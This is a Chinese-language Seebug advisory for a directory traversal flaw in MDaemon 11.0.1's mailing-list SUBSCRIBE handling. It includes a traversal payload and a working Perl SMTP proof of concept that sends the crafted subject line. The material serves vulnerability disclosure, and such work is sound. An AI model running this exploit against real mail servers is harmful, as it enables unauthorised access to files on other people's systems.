Alt-N MDaemon 11.0.1邮件列表订阅目录遍历漏洞

2010-05-04T00:00:00
ID SSV:19545
Type seebug
Reporter Root
Modified 2010-05-04T00:00:00

Description

Alt-N MDaemon是一款基于Windows的邮件服务程序,WorldClient是其客户端。

MDaemon支持邮件列表功能。在配置邮件列表时,MDaemon会将邮件列表的配置存储在<MDaemonDir>(通常为 C:\MDaemon)\App目录下扩展名为grp的文件中,邮件列表组文件大致为:

---snip---

Mailing List file

; ListName = test@company.mail ; Private = N ; HideFromAddressBook = N ; AllowExpn = Y ; ListNameInSubject = Y

... ---snip---

在订阅邮件列表时,用户发送带有以下标题的邮件:

SUBSCRIBE test-mailinglist@<domainhere>

这时会在C:\MDaemon\App\目录中搜索名为test-mailinglist@domain.grp的 grp的文件。攻击者可以提供目录遍历序列指向到其他的文件,例如:

SUBSCRIBE VVV@"../../../../../../../../../../../../../../../../../users/kcope/openshare/foobar

在这种情况下MDaemon会在C:\Users\Kcope\OpenShare\foobar.grp下查找grp文件。如果存在,MDaemon就会使用这个文件并返回确认信。

Alt-N MDaemon 11.0.1 厂商补丁:

Alt-N

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.altn.com

                                        
                                            
                                                ---snip---
use IO::Socket::INET;
use MIME::Base64;

$|=1;

$sock = IO::Socket::INET-&gt;new(PeerAddr =&gt; 'localhost',
                              PeerPort =&gt; '25',
                              Proto    =&gt; 'tcp');

print $sock &quot;EHLO you\r\n&quot;;
print $sock &quot;MAIL FROM: &lt;niko&gt;\r\n&quot;;
print $sock &quot;RCPT TO: &lt;MDaemon\@company.mail&gt;\r\n&quot;;
print $sock &quot;DATA\r\n&quot;;
print $sock &quot;Date: 23 Oct 81 11:22:33\r\n&quot;;
print $sock &quot;From: &lt;niko&gt;\r\n&quot;;
print $sock &quot;To: &lt;MDaemon\@company.mail&gt;\r\n&quot;;
print $sock &quot;Subject: SUBSCRIBE
VVV\@\&quot;../../../../../../../../../../../../../../../../../users/kcope/openshare/foobar\r\n&quot;;
print $sock &quot;\r\n\r\ntest\r\n.\r\nQUIT\r\n&quot;;
print &quot;.&quot;;

while(&lt;$sock&gt;) {
    print;
}
---snip---